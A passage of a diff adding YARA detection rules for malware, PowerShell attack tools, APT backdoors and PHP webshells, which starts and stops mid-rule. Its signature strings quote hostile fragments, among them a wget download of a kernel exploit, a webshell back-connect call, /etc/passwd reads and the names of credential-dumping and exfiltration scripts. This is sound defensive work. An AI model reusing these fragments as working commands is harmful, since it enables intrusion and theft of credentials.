+      description = "Detects simple Windows shell - from files s3.exe, s4.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/odzhan/shells/"
+      date = "2016-03-26 10:39:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
+      hash2 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
+      tags = "DEMO, EXE, FILE, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd                  - execute cmd.exe" fullword ascii
+      $s2 = "get <remote> <local> - download file" fullword ascii
+      $s3 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+      $s4 = "put <local> <remote> - upload file" fullword ascii
+      $s5 = "term                 - terminate remote client" fullword ascii
+      $s6 = "[ uploading \"%s\" to \"%s\"" fullword ascii
+      $s7 = "[ error : received %i bytes" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
+}
+
+rule Powershell_Attack_Scripts_RID3134 : DEMO HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Powershell Attack Scripts"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2016-03-09 13:12:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "PowershellMafia\\Invoke-Shellcode.ps1" ascii
+      $s2 = "Nishang\\Do-Exfiltration.ps1" ascii
+      $s3 = "PowershellMafia\\Invoke-Mimikatz.ps1" ascii
+      $s4 = "Inveigh\\Inveigh.ps1" ascii
+   condition: 
+      1 of them
+}
+
+rule PSAttack_ZIP_RID2B5E : DEMO FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "PSAttack - Powershell attack tool - file PSAttack.zip"
+      author = "Florian Roth"
+      reference = "https://github.com/gdssecurity/PSAttack/releases/"
+      date = "2016-03-09 09:03:31"
+      score = 100
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "PSAttack.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and all of them
+}
+
+rule PSAttack_EXE_RID2B4D : DEMO EXE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "PSAttack - Powershell attack tool - file PSAttack.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/gdssecurity/PSAttack/releases/"
+      date = "2016-03-09 09:00:41"
+      score = 100
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Release\\PSAttack.pdb" 
+      $s1 = "set-executionpolicy bypass -Scope process -Force" fullword wide
+      $s2 = "PSAttack.Modules." ascii
+      $s3 = "PSAttack.PSAttackProcessing" fullword ascii
+      $s4 = "PSAttack.Modules.key.txt" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and ( $x1 or 2 of ( $s* ) ) ) or 3 of them
+}
+
+rule Locky_Ransomware_RID2D91 : CRIME DEMO MAL RANSOM {
+   meta:
+      description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
+      author = "Florian Roth"
+      reference = "https://goo.gl/qScSrE"
+      date = "2016-02-17 10:37:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CRIME, DEMO, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 } 
+      $o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 } 
+   condition: 
+      all of ( $o* )
+}
+
+rule Sofacy_Fybis_ELF_Backdoor_Gen1_RID3236 : APT DEMO FILE G0007 G0019 LINUX MAL RUSSIA {
+   meta:
+      description = "Detects Sofacy Fysbis Linux Backdoor_Naikon_APT_Sample1"
+      author = "Florian Roth"
+      reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
+      date = "2016-02-13 13:55:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
+      hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
+      tags = "APT, DEMO, FILE, G0007, G0019, LINUX, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Your command not writed to pipe" fullword ascii
+      $x2 = "Terminal don`t started for executing command" fullword ascii
+      $x3 = "Command will have end with \\n" fullword ascii
+      $s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" fullword ascii
+      $s2 = "Success execute command or long for waiting executing your command" fullword ascii
+      $s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" fullword ascii
+      $s4 = "rm -f /usr/lib/systemd/system/" fullword ascii
+      $s5 = "ExecStart=" fullword ascii
+      $s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 500KB and 1 of ( $x* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) )
+}
+
+rule Sofacy_Fysbis_ELF_Backdoor_Gen2_RID32AA : APT DEMO FILE G0007 LINUX MAL RUSSIA {
+   meta:
+      description = "Detects Sofacy Fysbis Linux Backdoor"
+      author = "Florian Roth"
+      reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
+      date = "2016-02-13 14:14:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
+      hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
+      hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61"
+      tags = "APT, DEMO, FILE, G0007, LINUX, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "RemoteShell" ascii
+      $s2 = "basic_string::_M_replace_dispatch" fullword ascii
+      $s3 = "HttpChannel" ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 500KB and all of them
+}
+
+rule Codoso_PlugX_3_RID2C59 : APT DEMO EXE FILE G0073 MAL {
+   meta:
+      description = "Detects Codoso APT PlugX Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 09:45:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
+      $s2 = "mcs.exe" fullword ascii
+      $s3 = "McAltLib.dll" fullword ascii
+      $s4 = "WinRAR self-extracting archive" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1200KB and all of them
+}
+
+rule Codoso_PlugX_2_RID2C58 : APT DEMO EXE G0073 MAL {
+   meta:
+      description = "Detects Codoso APT PlugX Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 09:45:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%TEMP%\\HID" fullword wide
+      $s2 = "%s\\hid.dll" fullword wide
+      $s3 = "%s\\SOUNDMAN.exe" fullword wide
+      $s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide
+      $s5 = "%s\\HID.dllx" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them
+}
+
+rule Codoso_CustomTCP_4_RID2DCC : APT DEMO EXE FILE G0073 MAL T1007 {
+   meta:
+      description = "Detects Codoso APT CustomTCP Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:47:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
+      hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
+      hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
+      tags = "APT, DEMO, EXE, FILE, G0073, MAL, T1007"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "varus_service_x86.dll" fullword ascii
+      $s1 = "/s %s /p %d /st %d /rt %d" fullword ascii
+      $s2 = "net start %%1" fullword ascii
+      $s3 = "ping 127.1 > nul" fullword ascii
+      $s4 = "McInitMISPAlertEx" fullword ascii
+      $s5 = "sc start %%1" fullword ascii
+      $s6 = "net stop %%1" fullword ascii
+      $s7 = "WorkerRun" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 5 of them ) or ( $x1 and 2 of ( $s* ) )
+}
+
+rule Codoso_CustomTCP_3_RID2DCB : APT DEMO EXE G0073 MAL {
+   meta:
+      description = "Detects Codoso APT CustomTCP Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:47:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "DnsApi.dll" fullword ascii
+      $s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
+      $s3 = "CONNECT %s:%d hTTP/1.1" ascii
+      $s4 = "CONNECT %s:%d HTTp/1.1" ascii
+      $s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
+      $s6 = "iphlpapi.dll" ascii
+      $s7 = "%systemroot%\\Web\\" ascii
+      $s8 = "Proxy-Authorization: Negotiate %s" ascii
+      $s9 = "CLSID\\{%s}\\InprocServer32" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them
+}
+
+rule Codoso_CustomTCP_2_RID2DCA : APT DEMO EXE FILE G0073 MAL T1007 {
+   meta:
+      description = "Detects Codoso APT CustomTCP Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0073, MAL, T1007"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "varus_service_x86.dll" fullword ascii
+      $s2 = "/s %s /p %d /st %d /rt %d" fullword ascii
+      $s3 = "net start %%1" fullword ascii
+      $s4 = "ping 127.1 > nul" fullword ascii
+      $s5 = "McInitMISPAlertEx" fullword ascii
+      $s6 = "sc start %%1" fullword ascii
+      $s7 = "B_WKNDNSK^" fullword ascii
+      $s8 = "net stop %%1" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 406KB and all of them
+}
+
+rule Codoso_PGV_PVID_6_RID2CEB : APT DEMO EXE FILE G0073 MAL T1085 {
+   meta:
+      description = "Detects Codoso APT PGV_PVID Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:09:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0073, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "rundll32 \"%s\",%s" fullword ascii
+      $s1 = "/c ping 127.%d & del \"%s\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 6000KB and all of them
+}
+
+rule Codoso_Gh0st_3_RID2C2F : APT DEMO EXE G0073 MAL {
+   meta:
+      description = "Detects Codoso APT Gh0st Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 09:38:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "RunMeByDLL32" fullword ascii
+      $s1 = "svchost.dll" fullword wide
+      $s2 = "server.dll" fullword ascii
+      $s3 = "Copyright ? 2008" fullword wide
+      $s4 = "testsupdate33" fullword ascii
+      $s5 = "Device Protect Application" fullword wide
+      $s6 = "MSVCP60.DLL" fullword ascii
+      $s7 = "mail-news.eicp.net" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 195KB and $x1 or 4 of them
+}
+
+rule Codoso_Gh0st_2_RID2C2E : APT DEMO EXE FILE G0073 MAL T1085 {
+   meta:
+      description = "Detects Codoso APT Gh0st Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 09:38:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0073, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
+      $s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
+      $s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+      $s14 = "%s -r debug 1" fullword ascii
+      $s15 = "\\\\.\\keymmdrv1" fullword ascii
+      $s17 = "RunMeByDLL32" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
+}
+
+rule Codoso_CustomTCP_RID2D39 : DEMO EXE FILE G0073 MAL {
+   meta:
+      description = "Codoso CustomTCP Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:22:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "wnyglw" fullword ascii
+      $s5 = "WorkerRun" fullword ascii
+      $s7 = "boazdcd" fullword ascii
+      $s8 = "wayflw" fullword ascii
+      $s9 = "CODETABL" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 405KB and all of them
+}
+
+rule Codoso_PGV_PVID_5_RID2CEA : APT DEMO EXE FILE G0073 MAL {
+   meta:
+      description = "Detects Codoso APT PGV PVID Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:09:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+      hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+      tags = "APT, DEMO, EXE, FILE, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/c del %s >> NUL" fullword ascii
+      $s2 = "%s%s.manifest" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of them
+}
+
+rule Codoso_PlugX_1_RID2C57 : APT DEMO EXE FILE G0073 MAL {
+   meta:
+      description = "Detects Codoso APT PlugX Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 09:45:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
+      hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
+      hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
+      tags = "APT, DEMO, EXE, FILE, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GETPASSWORD1" fullword ascii
+      $s2 = "NvSmartMax.dll" fullword ascii
+      $s3 = "LICENSEDLG" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and all of them
+}
+
+rule Codoso_PGV_PVID_3_RID2CE8 : APT DEMO G0073 MAL {
+   meta:
+      description = "Detects Codoso APT PGV PVID Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:09:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
+      hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+      hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
+      tags = "APT, DEMO, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Copyright (C) Microsoft Corporation.  All rights reserved.(C) 2012" fullword wide
+   condition: 
+      $x1
+}
+
+rule Codoso_PGV_PVID_2_RID2CE7 : APT DEMO EXE FILE G0073 MAL T1050 T1117 {
+   meta:
+      description = "Detects Codoso APT PGV PVID Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:09:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+      hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+      hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+      tags = "APT, DEMO, EXE, FILE, G0073, MAL, T1050, T1117"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
+      $s1 = "regsvr32.exe /s \"%s\"" fullword ascii
+      $s2 = "Help and Support" fullword ascii
+      $s3 = "netsvcs" fullword ascii
+      $s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii
+      $s10 = "winlogon" fullword ascii
+      $s11 = "System\\CurrentControlSet\\Services" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 907KB and all of them
+}
+
+rule Codoso_PGV_PVID_1_RID2CE6 : APT DEMO EXE G0073 MAL {
+   meta:
+      description = "Detects Codoso APT PGV PVID Malware"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+      date = "2016-01-30 10:08:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
+      hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
+      hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
+      tags = "APT, DEMO, EXE, G0073, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Cookie: pgv_pvid=" ascii
+      $x2 = "DRIVERS\\ipinip.sys" fullword wide
+      $s1 = "TsWorkSpaces.dll" fullword ascii
+      $s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
+      $s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii
+      $s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii
+      $s5 = "Microsoft Chart ActiveX Control" fullword wide
+      $s6 = "MSChartCtrl.ocx" fullword wide
+      $s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii
+      $s8 = "WUServiceMain" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 3 of them ) ) or 5 of them
+}
+
+rule Payload_Exe2Hex_RID2CB3 : DEMO SCRIPT T1064 {
+   meta:
+      description = "Detects payload generated by exe2hex"
+      author = "Florian Roth"
+      reference = "https://github.com/g0tmi1k/exe2hex"
+      date = "2016-01-15 10:00:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "set /p \"=4d5a" ascii
+      $a2 = "powershell -Command \"$hex=" ascii
+      $b1 = "set+%2Fp+%22%3D4d5" ascii
+      $b2 = "powershell+-Command+%22%24hex" ascii
+      $c1 = "echo 4d 5a " ascii
+      $c2 = "echo r cx >>" ascii
+      $d1 = "echo+4d+5a+" ascii
+      $d2 = "echo+r+cx+%3E%3E" ascii
+   condition: 
+      all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* )
+}
+
+rule Webshell_c100_RID2B9A : DEMO T1087 T1100 T1105 WEBSHELL {
+   meta:
+      description = "Detects Webshell - rule generated from from files c100 v. 777shell"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 09:13:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+      hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+      hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+      tags = "DEMO, T1087, T1100, T1105, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
+      $s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
+      $s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
+      $s4 = "which wget curl w3m lynx" ascii
+      $s6 = "netstat -atup | grep IST" ascii
+   condition: 
+      filesize < 685KB and 2 of them
+}
+
+rule Webshell_27_9_acid_c99_locus7s_RID31FA : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 13:45:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+      hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+      hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
+      $s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
+   condition: 
+      filesize < 1711KB and 1 of them
+}
+
+rule Webshell_27_9_c66_c99_RID2E09 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php, c993.txt ..."
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 10:57:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+      hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+      hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
+      $s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
+      $s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
+   condition: 
+      filesize < 685KB and 1 of them
+}
+
+rule Webshell_Ayyildiz_RID2DF5 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Webshell"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 10:54:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
+      hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
+      hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
+      $s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
+   condition: 
+      filesize < 112KB and all of them
+}
+
+rule Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256_RID3D6B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Webshell - rule generated from from files acid.php, FaTaLisTiCz_Fx.txt, fx.txt, p0isoN.sh3ll.txt, x0rg.byp4ss.txt"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 21:53:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+      hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+      hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
+      $s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
+   condition: 
+      filesize < 882KB and all of them
+}
+
+rule Webshell_AcidPoison_RID2E8F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects Poison Sh3ll - Webshell"
+      author = "Florian Roth"
+      reference = "https://github.com/nikicat/web-malware-collection"
+      date = "2016-01-11 11:19:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+      hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+      hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
+   condition: 
+      filesize < 550KB and all of them
+}
+
+rule Webshell_acid_AntiSecShell_3_RID31C7 : DEMO T1100 WEBSHELL {
+   meta:
